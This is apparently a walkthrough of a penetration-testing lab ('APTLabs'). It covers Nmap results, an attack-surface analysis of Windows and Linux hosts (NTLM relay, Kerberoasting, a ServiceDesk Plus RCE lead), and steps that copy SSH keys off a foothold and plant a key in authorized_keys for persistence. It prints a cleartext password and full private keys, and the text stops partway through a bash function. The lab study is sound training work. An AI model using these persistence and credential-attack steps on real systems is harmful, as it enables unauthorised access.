    SF:s\x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r
    SF:(RTSPRequest,133,"RTSP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
    SF:text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Co
    SF:ntent-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20la
    SF:ng=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body
    SF:>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\
    SF:x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r(S
    SF:IPOptions,132,"SIP/2\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20text
    SF:/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Conten
    SF:t-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20lang=\
    SF:"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body>\n\
    SF:x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\x20n
    SF:ot\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n");
    
    Nmap scan report for 172.17.0.4
    Host is up (0.00053s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT     STATE SERVICE VERSION
    80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-title: DataLeaks
    | http-cookie-flags: 
    |   /: 
    |     PHPSESSID: 
    |_      httponly flag not set
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    3306/tcp open  mysql?
    | mysql-info: 
    |   Protocol: 10
    |   Version: 5.7.26-0ubuntu0.18.04.1-log
    |   Thread ID: 254
    |   Capabilities flags: 63487
    |   Some Capabilities: SupportsTransactions, SupportsCompression, Support41Auth, Speaks41ProtocolOld, LongPassword, IgnoreSigpipes, InteractiveClient, LongColumnFlag, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, ODBCClient, FoundRows, Speaks41ProtocolNew, SupportsLoadDataLocal, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
    |   Status: Autocommit
    |   Salt: qP\x0F!R/#\x18V\x0CV)7M\x12~_FU
    |_  Auth Plugin Name: mysql_native_password
    
    Nmap scan report for 172.17.0.5
    Host is up (0.00012s latency).
    Not shown: 65534 closed tcp ports (conn-refused)
    PORT   STATE SERVICE VERSION
    80/tcp open  http    Apache httpd 2.4.41 ((Unix))
    |_http-title: Gigantic Hosting | Home
    |_http-server-header: Apache/2.4.41 (Unix)
    | http-methods: 
    |_  Potentially risky methods: TRACE
    
    Nmap scan report for 172.17.0.6
    Host is up.
    All 65535 scanned ports on 172.17.0.6 are in ignored states.
    Not shown: 65535 filtered tcp ports (no-response)
    
    Post-scan script results:
    | ssh-hostkey: Possible duplicate hosts
    | Key 256 db:a6:6d:8b:e4:32:f3:57:1a:24:ef:6c:d6:15:ab:a9 (ED25519) used by:
    |   192.168.5.13
    |   192.168.5.21
    | Key 256 02:ab:aa:01:64:de:c5:89:2f:75:e3:6a:a9:ff:78:ee (ECDSA) used by:
    |   172.17.0.1
    |   192.168.20.31
    | Key 256 9a:c2:d3:a0:fe:6a:ad:9a:4a:85:0d:c1:15:d1:13:be (ED25519) used by:
    |   172.17.0.1
    |_  192.168.20.31
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 18 IP addresses (18 hosts up) scanned in 1282.10 seconds
    sshuser@nextcloud:~/saomiao$ 
    

8. Analysis of the results

Based on the Nmap output, these are the key findings and the potential attack surface, grouped by host:

1. 192.168.5.13, 192.168.5.21, 192.168.5.62, 192.168.5.74

  • SSH (port 22): OpenSSH 7.5. A fairly old release (current stable is 9.x), so check it for known CVEs; the one that is practically useful against 7.5 is username enumeration (CVE-2018-15473, fixed in 7.7), which only narrows the user list and does not give access on its own.

  • HTTP? (port 80): Nmap could not identify the service, but the port is open. Probe it further, for example by opening http://<IP> in a browser or running nikto and gobuster against it to look for misconfigurations, known vulnerabilities and hidden directories.

  • DNS (port 53): generic DNS responses, software not identified. Low exploitation potential unless it is misconfigured (for instance allowing zone transfers: dig axfr @<IP> <domain>), but still worth noting.

  • Duplicate SSH host key: 192.168.5.13 and 192.168.5.21 present the same ED25519 host key (see the post-scan ssh-hostkey results). This usually means a cloned VM whose host keys were never regenerated; not a vulnerability by itself, but a sign of sloppy administration and a hint that the two boxes were built from the same image.

2. 192.168.5.88, 192.168.5.231, 192.168.5.242, 192.168.20.1

  • DNS (port 53): Unbound. Determine the exact version and look for known vulnerabilities or misconfigurations for that release (open resolver, cache-poisoning exposure and so on). Unless the operator has set hide-version, `dig version.bind chaos txt @<IP>` returns the version string.

3. 192.168.20.15 (Windows)

  • HTTP (ports 80, 5985): Microsoft HTTPAPI httpd 2.0. Port 5985 is WinRM (Windows Remote Management). If WinRM is enabled and poorly configured (Basic authentication, unencrypted transport allowed) it can be abused, and with any valid credentials it is a straightforward remote shell (evil-winrm). The default "Not Found" page itself tells us little.

  • HTTPS? (port 443): service not identified; probe it, for example by opening https://192.168.20.15 in a browser or with `curl -k -i https://192.168.20.15/`.

  • Unknown (port 49443): unidentified; probe it manually (`nc -v 192.168.20.15 49443`, `curl -k -i https://192.168.20.15:49443/`).

4. 192.168.20.31 / 172.17.0.1 (Linux, Ubuntu: the Docker host, which is the foothold itself)

  172.17.0.1 is the default docker0 bridge gateway, i.e. the Docker host's own address on the container network. The post-scan host-key check shows it shares its SSH host keys with 192.168.20.31, and Nmap reports "Host: nextcloud", so the two addresses are one machine: the nextcloud box the scan was run from. Several of its "open" ports are evidently published container ports (compare 172.17.0.5:80 with 172.17.0.1:5000, 172.17.0.3:8000 with 172.17.0.1:8000, and 172.17.0.2:443 and :53 with 172.17.0.1:8080 and :53).

  • SSH (port 22): OpenSSH 8.9p1 (Ubuntu). A recent release, so a serious remote vulnerability is unlikely, but the exact Ubuntu patch level is still worth checking.

  • SMTP (port 25): Postfix. Check for an open relay and for version-specific issues. smtp-commands shows VRFY is enabled, which allows user enumeration (connect with nc and send `VRFY root`).

  • DNS (port 53): PowerDNS Authoritative Server 4.1.11, an old release; look for known PowerDNS 4.1.x vulnerabilities.

  • HTTPS (port 443): Apache httpd 2.4.52 (Ubuntu), serving a certificate for 0x0security.com and *.0x0security.com. Check the Apache release for known issues and review the TLS configuration.

  • HTTP (port 5000): Apache httpd 2.4.41 (Unix), older than the build on 443 and therefore more likely to carry unpatched issues. http-methods reports TRACE enabled, which enables Cross-Site Tracing (XST); confirm with `curl -X TRACE -i http://<IP>:5000/`.

  • HTTP (port 8000): Nmap labelled it "rtsp", but every probe (including the RTSP and SIP probes) got back an HTTP-style 404 page with X-Frame-Options: DENY and X-Content-Type-Options: nosniff, so this is an HTTP application server that simply echoes whatever protocol token the client sent, not RTSP. Browse http://<IP>:8000 and fuzz paths; the 404 page is the framework's default, so the real routes live elsewhere.

  • HTTPS (port 8080): Python BaseHTTPServer / PowerGSLB 1.7.3 on Python 2.7.5. Python 2.7 is end-of-life with plenty of unfixed issues, PowerGSLB itself may be vulnerable, and the certificate is self-signed and expired in 2021. High-risk service.

  • JetDirect? (port 9100): TCP 9100 is normally raw printing (JetDirect), which can be abused to send jobs, read device information or retrieve queued documents; on a Docker host that returned no banner it may equally be something else. Check with `nc -v 172.17.0.1 9100`.

  • Duplicate SSH host key: the two IPs share the same host keys, which confirms they are the same physical or virtual host.

5. 192.168.21.123 (Windows)

  • HTTPS (port 443): ManageEngine ServiceDesk Plus

    ServiceDesk Plus is Zoho/ManageEngine's IT service management suite: ITSM basics, IT asset management (ITAM) and a CMDB with enterprise service management (ESM) features, marketed as a scalable and secure option for organisations that want IT and enterprise service management with a proportionate return on investment.

    ITSM software is a high-value target, and ServiceDesk Plus has a long history of severe vulnerabilities (RCE, SQLi, authentication bypass). Nmap did not identify the exact version, so this is the first thing to investigate: search for recent ServiceDesk Plus vulnerabilities and default credentials. Its self-signed certificate with a 100-year validity period also suggests an unmanaged, non-standard setup.

    A direct Google search for "manageengine servicedesk plus exploit" turns up CVE-2021-44077, an unauthenticated RCE fixed in build 11306:
    https://github.com/horizon3ai/CVE-2021-44077

    Confirm the build before relying on it. ManageEngine products normally append the build number to script URLs as a cache-buster, and the Nmap fingerprint shows /scripts/ClientLogger.js?11106; if 11106 is indeed the build, it predates the fix. Verify it from the application itself rather than from this hint alone.

  • microsoft-ds? (port 445): SMB. smb2-security-mode reports "Message signing enabled but not required". That makes this host a viable NTLM relay target: NTLM authentication captured or coerced from a user elsewhere on the network (Responder, a coercion primitive, a poisoned share) can be relayed to this host's SMB service with ntlmrelayx, giving the attacker that user's privileges on it (a SAM dump or command execution if the user is a local administrator here). Relay only works against hosts that do not enforce signing, which is exactly the state reported.

  • HTTP (port 5985): Microsoft HTTPAPI httpd 2.0 (WinRM). Once credentials or a usable hash have been obtained, for instance through the relay above, WinRM gives an interactive shell for lateral movement (evil-winrm).

6. 192.168.20.10 (Windows, Domain Controller for 0x0security.local)

  • DNS (port 53): reported as Simple DNS Plus, which is how Nmap usually fingerprints Microsoft's own DNS server on a DC; treat it as Windows DNS. Look for version-specific issues; as the domain's DNS, misconfiguration (zone transfers, unsecured dynamic updates) has wide impact.

  • Kerberos (port 88): Microsoft Windows Kerberos. Kerberoasting is possible with any domain account if service accounts have weak passwords; AS-REP roasting if any account has pre-authentication disabled. Note the skew Nmap reports (clock-skew: 6h57m45s, server time 2025-04-08 01:24:49Z): Kerberos rejects requests whose timestamp is more than five minutes off (KRB_AP_ERR_SKEW), so synchronise the attacking box to the DC (`ntpdate <DC>`, or run the tools under faketime) before any Kerberos-based attack.

  • LDAP (ports 389, 3268) / LDAPS (ports 636, 3269): Active Directory LDAP and the Global Catalog. Check whether anonymous bind is allowed for enumerating users and groups; with any valid credentials LDAP is the main source of domain information (ldapsearch, ldapdomaindump, BloodHound collectors).

  • SMB (ports 139, 445): smb2-security-mode reports "Message signing enabled and required". That is the correct configuration and rules out NTLM relay to this DC over SMB. It says nothing about LDAP: if LDAP signing and LDAPS channel binding are not enforced, relaying to the DC's LDAP/LDAPS may still work.

  • MS RPC (ports 135, 593 and several high ports): check for known RPC issues; these endpoints are also what the coercion primitives talk to once credentials are available.

  • HTTP (port 5985): WinRM; usable to administer the DC once credentials are available.

  • kpasswd5 (port 464): Kerberos password-change service.

  • .NET Message Framing (port 9389): Active Directory Web Services.

  • Summary: this is the domain controller and the core of the network. SMB is configured safely, but LDAP, Kerberos, DNS and RPC still need configuration review and vulnerability checks.

7. 172.17.0.2 (Linux container)

  • DNS (port 53): PowerDNS Authoritative Server 4.1.11; the same service as 192.168.20.31:53, which is evidently this container published on the host.

  • HTTPS (port 443): Python BaseHTTPServer / PowerGSLB 1.7.3 on Python 2.7.5; the same as 192.168.20.31:8080. High risk, expired certificate.

8. 172.17.0.3 (Linux container)

  • HTTP (port 8000): the same application as 192.168.20.31:8000 (misidentified as RTSP, returns an HTTP 404); needs manual investigation.

9. 172.17.0.4 (Linux, Ubuntu container)

  • HTTP (port 80): Apache httpd 2.4.29 (Ubuntu); check this release for known issues. The http-title "DataLeaks" is a strong signal that the server hosts sensitive data, deliberately or not. http-cookie-flags shows the PHPSESSID cookie is set without HttpOnly, so the session cookie is readable from JavaScript and can be stolen through any XSS in the application.

  • MySQL (port 3306): MySQL 5.7.26, reachable from the network, authentication plugin mysql_native_password. Test weak and default credentials (root with an empty password, root/root, root/password) and check the release for known vulnerabilities; a database exposed directly on the container network is itself a finding.

10. 172.17.0.5 (Linux container)

  • HTTP (port 80): Apache httpd 2.4.41 (Unix); the same as 192.168.20.31:5000, check for known issues, TRACE enabled.

11. 172.17.0.6

  • All 65535 ports filtered: Nmap cannot tell open from closed, which normally means a firewall or a container that drops probes. Since the scan ran on the Docker host, check whether the Docker CLI or socket is usable from the foothold account (`docker ps`, `ls -l /var/run/docker.sock`) to learn what this container actually runs.

Prioritised candidates and recommended actions:

  1. High priority:

    • 192.168.21.123 (ManageEngine ServiceDesk Plus and SMB signing not required):

      • Action: identify the ServiceDesk Plus build and match it against the known vulnerabilities (Exploit-DB, CVE-2021-44077). Test NTLM relay against it, using Responder for capture and ntlmrelayx for the relay.

    • 172.17.0.4 (DataLeaks, missing HttpOnly, MySQL):

      • Action: review the content of http://172.17.0.4 immediately. Try credential guessing against MySQL. Look for XSS on the site to exploit the missing HttpOnly flag. Check Apache 2.4.29 for known issues.

    • 192.168.20.31:8080 / 172.17.0.1:8080 / 172.17.0.2:443 (Python 2.7 EOL):

      • Action: look for known vulnerabilities in PowerGSLB 1.7.3 and Python 2.7; check for command injection and other web application flaws.

    • 192.168.20.10 (Domain Controller):

      • Action: try anonymous LDAP enumeration. Enumerate users with Kerbrute (userenum), then Kerberoast with impacket's GetUserSPNs.py once any domain credential is available (Kerbrute only enumerates and sprays; it does not Kerberoast). Fix the clock skew first. Check the Windows DNS version.

  2. Medium priority:

    • 192.168.20.31:5000 / 172.17.0.1:5000 / 172.17.0.5:80 (Apache 2.4.41, TRACE enabled): check Apache issues, try XST.

    • 192.168.20.31:53 / 172.17.0.1:53 / 172.17.0.2:53 (PowerDNS 4.1.11): find and test known vulnerabilities.

    • OpenSSH 7.5 on several hosts: known issues such as username enumeration (CVE-2018-15473), of limited use on its own.

    • Unidentified services (e.g. 192.168.20.15:443, 192.168.20.15:49443, 192.168.20.31:8000): probe in depth with nc, telnet, curl, nikto and dirb/gobuster.

  3. Low priority / informational:

    • SMB signing enforced on the DC (good).

    • WinRM on the Windows hosts (needs credentials).

    • Duplicate SSH host keys (configuration hygiene).

    • Expired TLS certificates (poor hygiene; users trained to click through warnings are easier to MITM).

Recommended next steps:

  • Version lookups: query searchsploit and the online databases (CVE/MITRE, NIST NVD) for the identified versions (Apache, OpenSSH, PowerDNS, MySQL, Python, ServiceDesk Plus, Windows DNS and so on).

  • Web application scanning: run a web scanner (Nikto, OWASP ZAP, Burp Suite) against every HTTP/HTTPS port (80, 443, 5000, 8000, 8080, 5985), with particular attention to 172.17.0.4 and 192.168.21.123.

  • Credential attacks: test common and default credentials against SSH, MySQL, WinRM and ServiceDesk Plus.

  • NTLM relay: test relay against 192.168.21.123.

  • LDAP/Kerberos: attempt LDAP enumeration and Kerberoasting against 192.168.20.10.

  • Manual probing: connect by hand to every port Nmap could not identify.

Remember that all of this requires authorisation for the target environment. Good luck with the lab.


III. Internal network tunnelling and proxy setup

1. Why tunnel

  • To reach internal resources directly from Kali

  • To avoid the repeated connections that raise the risk of detection

  • To have a stable channel for the rest of the engagement

2. SSH key preparation and format conversion

  • First copy the RSA public and private key from the target to the local box

    ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
    └─# scp sshuser@10.10.110.74:/home/sshuser/.ssh/id_rsa* ./
    sshuser@10.10.110.74's password: ca!@vyhjyt@#$!@31CASDF&^*3451@WADSFewr
    id_rsa                                                                                      100% 1766     2.0KB/s   00:00    
    id_rsa.pub                                                                                  100%  399     0.6KB/s   00:00    
    ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
    └─# ls -liah id_rsa*
    3147102 -rw------- 1 root root 1.8K  4月 8日 03:16 id_rsa
    3147380 -rw-r--r-- 1 root root  399  4月 8日 03:16 id_rsa.pub
    

  • Convert the discovered RSA key to OpenSSH format

    The encrypted RSA private key (id_rsa) was re-saved with ssh-keygen -p, which removed its
    passphrase and wrote it out in the new OpenSSH private-key format.

    -----BEGIN RSA PRIVATE KEY-----
    Proc-Type: 4,ENCRYPTED
    DEK-Info: AES-128-CBC,C373000CFD54B3F4508922250C171ED4
    
    mGPS7QR4zX5++D5HVla7VzvT4cUtMFDV/jWdnL6sGI9ne5Ft7CqqJGKayJrCD115
    8AYLM3JZqtKBHDhffntvlYeErQCS5QiGAUwPEw6FpfA1rYBm6yMMYkUxOh1FOcGD
    vNm91sOA6xlN1uqN1lEU97rgMTZW3cuuAk1mL+VyJ+cH8KmCVxhnDIJ+YIUbMI13
    UN/dY0B3x7tljsLPmOzJqEShXwTPqwW9Iebg5jdPMCRz/XUf3Jsm4NQ924+EC8K/
    nmsFou94k7ofL4nMLVvf3ZZQv6xTNR4W6zPiCpwASX+r36zJgxPfUyvQUYPAX9Xf
    pRWlj9nTQ8ui7aKnLnDpMX826uvHuYyWILIpp2LNMjMoBAqy3tqgBWbyXH2zeBff
    6m8ShHyAAXRzJBE+CKiBGPUamINsUVnYZCFco33NkW0XLrFN83/pYoYsm+sQsOgt
    zcaH8EcO6uUCtpVLCdr/nWw9mZG+FwtWIe9CtZmP1MT+DO5Wpkes6T90k67W18yz
    wqE0JWNcTv2tJZAtEN2pBZkcMAorLuZuyQieQ4y2WM5I1d8wpK3aGleMStrUvWer
    oXMWlL4eQK9E/apzs0wdDNf6ZCKIRSiQ75r1mydj3DTbQCywH+4TUcRLTo4XMlwo
    A9fNZtliPNrY0RUgJOq4Id4O/RKkysp3JrSLH8rC8sUFWXXajZxC43t5ky1uF8vo
    ML7NJI3bymEEaG58rvUlfcBoGcjjJKw+NKuv6CPQkqP69LPNtjoJxOczrPCvzDJj
    2mZpForsr1wMMbjjzNur0txBRUHEsoYiRwM/2Fwjbvij4szGOEvV3ensGc2hrDzz
    SfwnqBJ2/7O5jB3CVa8jk1klDjWdi9P3yG1IvJytQzMSg/m7GV0j3oYQt253AqSL
    qSazpfpL5qjtI20sylLyc8T1B/Fs97qqSgxE6I3pS5Jp59BmW95P1bZqq+lfBZB+
    odTNyB7uSW+bCnLmChKKYoVb0ZbhnYUmoHxvKuXM4gWWsIjbLvmD8ZhZuQiDbRD/
    5sJfltEAntIShDzJ76SSpk6J9mzK21sngaGRJZuIWaDjnBM0zjoqc0MiTXoxFlwI
    uq/2Jre8oSY+qD9xP2+uaGDKCMFxjcG+bm626W5KPyOPUIyn/DfpoC4DgDPlzncU
    /tKHaxTxcIsrZ+Vfn+D9IixHovJc21kvSTYpN7U7h3CCLRd3GWOkeO1hw+PPZrLF
    bANQ9qSJbvBW9+KlaKxZAnAlIUZqHG29EJABE2HwxWw+RUy3h32LrP3TyYzLikL2
    xnqgEAKq9y6AUarxKObRNWu/ytb9IO4LzeXEtFGwxcSZZ6sFShVJ79TzwA7fH5Ei
    vgNNtyOHtmH6wEvRz9bKpis9MHDeKjOCvHF7HqqIGw4CwZ4N8Y+N4zwHu3X2EPP/
    0E15Y+yBjNSpdV21M5lLtv9jqCTF8UoGZGqhyLN+E0zpNu1ZDLV7PA13S55OHr9d
    6zTf5H5dzCH42HUccp/1Krj0t0KqFKeEzy5WmvHFP2hpP+jlNjz7rWJVdh7lCi/f
    IeMfaTX5FRkY0MPLRmbS87s7WRuPMkJtmoqeJXNj91k2LqL8UPcA9cJeqkfCyy/M
    -----END RSA PRIVATE KEY-----

    This is the legacy PEM format, and it is encrypted: the Proc-Type: 4,ENCRYPTED and DEK-Info: AES-128-CBC,<IV> headers say so. Keys in this format derive the encryption key from the passphrase with OpenSSL's EVP_BytesToKey (a single MD5 iteration, salted with the first bytes of the IV), so a passphrase on a legacy PEM key is far cheaper to brute-force (ssh2john, then john or hashcat) than one on the newer openssh-key-v1 format, which uses a bcrypt KDF with 16 rounds by default. Here the passphrase was already known, so the key only had to be re-saved.


    ssh-keygen -p -o -f id_rsa

    What the command does:

    -p: change the passphrase (enter the old one, then set a new one or leave it empty).

    -o: write the private key in the new OpenSSH format. Since OpenSSH 7.8 this is the default and the flag is only kept for compatibility.

    -f id_rsa: the private key file to operate on.

    The same thing can be done non-interactively with -P '<old>' -N '' (old and new passphrase on the command line), at the cost of the old passphrase landing in the shell history.

  • Remove the passphrase protection to simplify automation

    ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
    └─# ssh-keygen -p -o -f id_rsa 
    Enter old passphrase: 
    Enter new passphrase (empty for no passphrase): 回车
    Enter same passphrase again: 回车
    Your identification has been saved with the new passphrase.
    

    Leaving the new passphrase empty (Enter twice) removes it; the private key is now stored unencrypted.

    The converted private key:

    -----BEGIN OPENSSH PRIVATE KEY-----
    b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
    NhAAAAAwEAAQAAAQEAlTNnzOqLuVDiS9JOSf8BfkE1P8vXkdCO/R35dPONVy3ttDE5v8ks
    8gwI2KyaKc6aUkVTbu2CpXVgTP2qRhna1ptXEQbV/eMAUsq+CxoHk4sL/AoY/Ynx2qr7YQ
    7lnZUxxctajKx+QryQak5gz//bKFeoVJfPZ+CrI/KjPiuWG+pVXal2v1bRpefB+cRMfF0Y
    USbwofFQG5X91DRx4ig7XKbr9sRhp0QE3KpS7W/j+TScT7+nsxpGHaMWTx88A9xnIfeFpb
    3vteZN7dhCrxVVbeDn8bKrvSruPgQU5D6g7NmOvzYGPiBrTzqTRwjVKXfIPEmmeE7rW8gl
    13dREnu/FwAAA7j2o5WT9qOVkwAAAAdzc2gtcnNhAAABAQCVM2fM6ou5UOJL0k5J/wF+QT
    U/y9eR0I79Hfl0841XLe20MTm/ySzyDAjYrJopzppSRVNu7YKldWBM/apGGdrWm1cRBtX9
    4wBSyr4LGgeTiwv8Chj9ifHaqvthDuWdlTHFy1qMrH5CvJBqTmDP/9soV6hUl89n4Ksj8q
    M+K5Yb6lVdqXa/VtGl58H5xEx8XRhRJvCh8VAblf3UNHHiKDtcpuv2xGGnRATcqlLtb+P5
    NJxPv6ezGkYdoxZPHzwD3Gch94Wlve+15k3t2EKvFVVt4Ofxsqu9Ku4+BBTkPqDs2Y6/Ng
    Y+IGtPOpNHCNUpd8g8SaZ4TutbyCXXd1ESe78XAAAAAwEAAQAAAQBodquQwA/AWq93IvKJ
    wLAM9B8SYei3QW08MAZ/Kh+mEJRD+8tRSsvbVS3Ed2UhLHTEcaGvI0C8FGiuv1S+7E9avz
    zAwSaHMq8BSM6y+zCez1Y+y9sfebwKvHhxRnriUJmewXjO0d89XsVGiUYjnCKYJnfHcttX
    AekRrEs7tkzNkb0n/42blq2yxGTmnPOsg+DzpXyoIF+mbD6Tx7JBhwsLU0DrMpz2hVrsD5
    PxWxXX9dPs6JBwpT3CNQER/HceIcIPzNaDgnnyF24Yw7nB8vZLyZYv7skV57ld4io+yC2u
    GUvbSL/FaEGcG1GJghwKv8b1F4ZijyTQzF8srmav0PsxAAAAgGP4ijO/zdfUAzxwKHt0KE
    QIBCQxaMOQ/J21Xx8jcoNz3xlT50ZiVIYHP5VF/FFLAU9wXUGTlQ4PYAeQJ6jqzBwDvIhz
    8G68z5Te98m2wtccmQ1qz/JVTDlUdRITGcWHaaEn0LKKMF/v4VwUQyDBb5QjuO27HgNd5A
    IZLT6GAV0kAAAAgQDG2hDfj8fR9TGX9CN9wyAOMDpDfhZUMiYfOjhEteSUt1z1cJgGMekQ
    HBvO97fz+Ms841GhJc28kca95KF1egW0WEI5jJ4VtJB7hRuTL+S+6P7CF74sbpWXFS73e4
    ZK8/HDhIWbuRepcCTGbehUCZbq+iL4OYjxu1ShRXbKkL5iJQAAAIEAwBRptNwjngmsq6PO
    V5HAoT7H9utjxbOQ+y1e5yvgrO/P5z8FUHBmOpUus3GF3U5UkyBDDzcMefkEGw1Yn8Wbjz
    fpXswSgnHNFBiAD4wmx1Te7F4bJKp87j4Aggnfu4Jj09FXnTicwKRa3uiSXTDRPp54bX6O
    O5f8ng+IbFy4EYsAAAAAAQID
    -----END OPENSSH PRIVATE KEY-----


    Rename this id_rsa to nextcloud.key so it is not confused with your own ~/.ssh/id_rsa; the commands below use that name.
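    The passphrase removal above can be scripted and checked. The following is an added example (not from the original write-up), written in bash and assuming OpenSSH's ssh-keygen is installed: it reports the key's container format, tests whether the key is still encrypted, strips the passphrase non-interactively (the -P/-N form of the ssh-keygen -p command used above) and confirms that the resulting private key still corresponds to the .pub found on the box. The file paths are parameters; nothing here is tied to the lab's id_rsa.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): inspect an SSH private key,
# strip its passphrase non-interactively and verify it still matches the
# public key we hold. Assumes OpenSSH's ssh-keygen is on PATH.

# Print the key's container format based on its headers:
#   pem-encrypted  legacy PEM with "Proc-Type: 4,ENCRYPTED" (like the page's id_rsa)
#   pem            legacy PEM, unencrypted
#   openssh        "BEGIN OPENSSH PRIVATE KEY" format (may or may not be encrypted)
key_format() {
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
        echo openssh
    elif grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        echo pem-encrypted
    else
        echo pem
    fi
}

# Return 0 if the private key cannot be loaded with an empty passphrase,
# i.e. it is encrypted. Works for both PEM and OPENSSH formats, and -P ''
# prevents ssh-keygen from prompting on a terminal.
key_is_encrypted() {
    ! ssh-keygen -y -P '' -f "$1" >/dev/null 2>&1
}

# Non-interactive equivalent of the page's `ssh-keygen -p -o -f id_rsa`:
# -P is the old passphrase, -N '' sets an empty new one, -o selects the
# OPENSSH container (the default on current versions).
strip_passphrase() {
    ssh-keygen -p -o -P "$2" -N '' -f "$1" >/dev/null
}

# Derive the public key from the private key and compare the base64 blob
# (field 2) with the .pub we hold; the comment field is ignored on purpose.
key_matches_pub() {
    local derived held
    derived=$(ssh-keygen -y -f "$1" | awk '{print $2}')
    held=$(awk '{print $2}' "$2")
    [ -n "$derived" ] && [ "$derived" = "$held" ]
}
```

    A failing key_matches_pub means the private key you extracted is not the one for the public key you are about to add to authorized_keys; check that before spending time on the login.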

  • Add the public key to authorized_keys for passwordless login

    The idea:
    use sshpass to log in to 10.10.110.74 as sshuser with the password,
    then append the user's own public key (.ssh/id_rsa.pub) to .ssh/authorized_keys,
    so that from then on the private key logs in without a password.
    This keeps the foothold even if the administrator rotates the password, as long as the key line stays in the file.

    The usual way to log in is:

    ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
    └─# sshpass -p 'ca!@vyhjyt@#$!@31CASDF&^*3451@WADSFewr' ssh sshuser@10.10.110.74
    Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-116-generic x86_64)
    
     System information as of Tue Apr  8 07:42:12 AM UTC 2025
      System load:  0.0                Processes:               286
      Usage of /:   78.3% of 12.22GB   Users logged in:         1
      Memory usage: 20%                IPv4 address for ens160: 192.168.20.31
      Swap usage:   0%
    Expanded Security Maintenance for Applications is not enabled.
    
    36 updates can be applied immediately.
    31 of these updates are standard security updates.
    To see these additional updates run: apt list --upgradable
    
    Enable ESM Apps to receive additional future security updates.
    See https://ubuntu.com/esm or run: sudo pro status
    
    The list of available updates is more than a week old.
    To check for new updates run: sudo apt update
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    
    Last login: Tue Apr  8 03:29:54 2025 from 10.10.16.111
    sshuser@nextcloud:~$ 


    One command does it: append the public key to authorized_keys.

    After logging in over ssh, run cat /home/sshuser/.ssh/id_rsa.pub >> /home/sshuser/.ssh/authorized_keys, or pass it as the remote command:

    ┌──(root㉿kali)-[~/Desktop/APTLabs/credentials]
    └─# sshpass -p 'ca!@vyhjyt@#$!@31CASDF&^*3451@WADSFewr' ssh sshuser@10.10.110.74 'cat /home/sshuser/.ssh/id_rsa.pub >> /home/sshuser/.ssh/authorized_keys'

    Or with ssh-copy-id:

    ┌──(root㉿kali)-[~/Desktop/APTLabs]
    └─# sshpass -p 'ca!@vyhjyt@#$!@31CASDF&^*3451@WADSFewr' \
    ssh-copy-id -f -i /root/Desktop/APTLabs/credentials/id_rsa.pub sshuser@10.10.110.74
    
    /usr/bin/ssh-copy-id: INFO: Source of key(s) to be installed: "/root/Desktop/APTLabs/credentials/id_rsa.pub"
    Number of key(s) added: 1
    
    Now try logging into the machine, with: "ssh -i 'sshuser@10.10.110.74'"
    and check to make sure that only the key(s) you wanted were added.

    Explanation:

    • -i: path of the public key to install.

    • -f: forced mode, install the key without checking whether it is already present on the remote side.

    • Without -f, ssh-copy-id performs that check by trying to log in with the matching private key, which it looks for next to the .pub (id_rsa for id_rsa.pub). Our private key has been renamed to nextcloud.key, so -f is required; the price is that running it twice installs the key twice, so check authorized_keys afterwards as the tool's own output suggests.
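    Appending with cat >> or ssh-copy-id -f checks neither for duplicates nor for file permissions. The following added example (not from the original write-up; bash, meant to run on the target, for instance piped through the sshpass login shown above with bash -s) installs a public key only once and makes sure .ssh and authorized_keys have the modes sshd accepts under StrictModes. The function names and the home-directory parameter are the example's own.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): install a public key into a
# user's authorized_keys idempotently and with the permissions sshd expects.
# `ssh-copy-id -f` skips its duplicate check, so a second run adds a second
# copy; this does not.

# install_pubkey <pubkey-file> <home-dir>
# Prints "added" if the key was appended, "present" if it was already there.
install_pubkey() {
    local pub="$1" home="$2"
    local sshdir="$home/.ssh" auth="$home/.ssh/authorized_keys"
    local blob
    # Field 2 of "ssh-rsa AAAA... comment" is the base64 key blob; compare on
    # that, since the comment may differ between copies of the same key.
    blob=$(awk 'NF >= 2 {print $2; exit}' "$pub")
    [ -n "$blob" ] || { echo "no key found in $pub" >&2; return 1; }

    mkdir -p "$sshdir"
    touch "$auth"
    # With StrictModes yes (the default) sshd ignores authorized_keys when
    # ~/.ssh or the file itself is group- or world-writable.
    chmod 700 "$sshdir"
    chmod 600 "$auth"

    if grep -qF -- "$blob" "$auth"; then
        echo present
    else
        # Append only the first key line, always newline-terminated, so a
        # .pub without a trailing newline cannot fuse with the next entry.
        awk 'NF >= 2 {print; exit}' "$pub" >> "$auth"
        echo added
    fi
}

# count_key <pubkey-file> <home-dir>: how many authorized_keys lines carry this blob
count_key() {
    local blob
    blob=$(awk 'NF >= 2 {print $2; exit}' "$1")
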